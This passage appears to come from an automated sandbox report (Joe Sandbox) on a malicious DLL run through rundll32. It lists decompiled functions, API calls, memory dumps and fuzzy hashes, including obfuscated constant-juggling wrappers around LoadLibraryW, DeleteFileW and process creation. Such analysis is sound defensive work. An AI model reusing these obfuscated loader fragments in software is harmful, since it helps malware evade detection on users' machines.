				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,CBF72908), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,CBF72908), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,CBF72908), ref: 10012920

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0xcbf72908
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6676 Parent PID: 3436 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1075
Total number of Limit Nodes:	17

Executed Functions

Function 048D52B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E048D52B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E048EFE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E048DEB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x048d52c0
0x048d52c3
0x048d52c5
0x048d52c8
0x048d52cc
0x048d52cd
0x048d52d2
0x048d52d9
0x048d52e2
0x048d52e9
0x048d52f0
0x048d52f7
0x048d52fe
0x048d530a
0x048d530f
0x048d5314
0x048d531b
0x048d531f
0x048d5326
0x048d532d
0x048d5337
0x048d533f
0x048d5342
0x048d5349
0x048d5360
0x048d5363
0x048d5376
0x048d537f
0x048d5385

APIs

LoadLibraryW.KERNEL32 ref: 048D537F

Strings

,*FV, xrefs: 048D52F7
.9h, xrefs: 048D52D9
1, xrefs: 048D5326

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: f8d5d4a79117a4bd69539f18e2e70e7cf92c4b8a857e1ec6e89500cb9782ffb1
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: 3D2156B5D01208FBEF08DFA8D94A9EEBBB5FB41304F108198E915B6250E3B46B14DF91

Uniqueness

Uniqueness Score: -1.00%

Function 048F1538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E048F1538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E048EFE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E048DEB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x048f153e
0x048f1543
0x048f1548
0x048f154f
0x048f1558
0x048f155f
0x048f156b
0x048f1570
0x048f1575
0x048f157c
0x048f1583
0x048f158a
0x048f1591
0x048f1595
0x048f159c
0x048f15a3
0x048f15ad
0x048f15b2
0x048f15ba
0x048f15bf
0x048f15c4
0x048f15cb
0x048f15d6
0x048f15e6
0x048f15e9
0x048f15f3
0x048f15f6
0x048f160a
0x048f1615
0x048f161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 048F1615

Strings

d , xrefs: 048F158A
Zs, xrefs: 048F154F

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: 67b6cd3435dc404de333c274e1d558fdc68db87c43191575eefe6a97b0fd7e43
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 18213EB5D40209FFEB04DFA5D9499DDBBB1EB40314F10C099E614BB250D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 048DD061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E048DD061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E048EFE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E048DEB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x048dd068
0x048dd06b
0x048dd06d
0x048dd070
0x048dd074
0x048dd075
0x048dd07a
0x048dd081
0x048dd087
0x048dd08e
0x048dd095
0x048dd09c
0x048dd0a3
0x048dd0a7
0x048dd0ae
0x048dd0b5
0x048dd0bc
0x048dd0c0
0x048dd0c7
0x048dd0ce
0x048dd0d5
0x048dd0dc
0x048dd0e3
0x048dd0ef
0x048dd0f7
0x048dd0fa
0x048dd101
0x048dd108
0x048dd10f
0x048dd116
0x048dd11d
0x048dd13c
0x048dd145
0x048dd14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 048DD145

Strings

7XJ, xrefs: 048DD0D5
3l}!, xrefs: 048DD0AE

Memory Dump Source

Source File: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, Offset: 048D0000, based on PE: true

Associated: 00000005.00000002.658323148.00000000048D0000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.658353407.00000000048F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_48d0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: ff25bb080fd91926688007923a617cb39c8923fcdc203abc63bad7a8568fa194
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 7F2145B5D01318AFDF08DFA5C98A9EEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 048F2C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E048F2C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
